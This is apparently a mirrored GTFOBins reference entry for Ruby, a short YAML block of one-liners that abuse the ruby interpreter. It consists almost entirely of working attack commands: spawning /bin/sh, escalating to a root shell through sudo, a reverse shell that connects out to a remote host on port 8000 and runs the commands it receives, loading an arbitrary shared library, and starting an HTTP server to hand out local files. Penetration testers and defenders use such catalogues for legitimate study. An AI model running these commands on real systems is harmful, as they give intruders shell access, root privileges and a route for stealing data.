mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
19 lines
607 B
Markdown
19 lines
607 B
Markdown
|
---
|
||
|
functions:
|
||
|
exec-interactive:
|
||
|
- code: ruby -e 'exec "/bin/sh"'
|
||
|
sudo-enabled:
|
||
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
||
|
reverse-shell:
|
||
|
- code: |
|
||
|
export RHOST=10.0.0.1
|
||
|
export RPORT=8000
|
||
|
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||
|
load-library:
|
||
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||
|
upload:
|
||
|
- description: Serve files in the local folder running an HTTP server.
|
||
|
code: |
|
||
|
export LPORT=8888
|
||
|
ruby -run -e httpd . -p $LPORT
|
||
|
---
|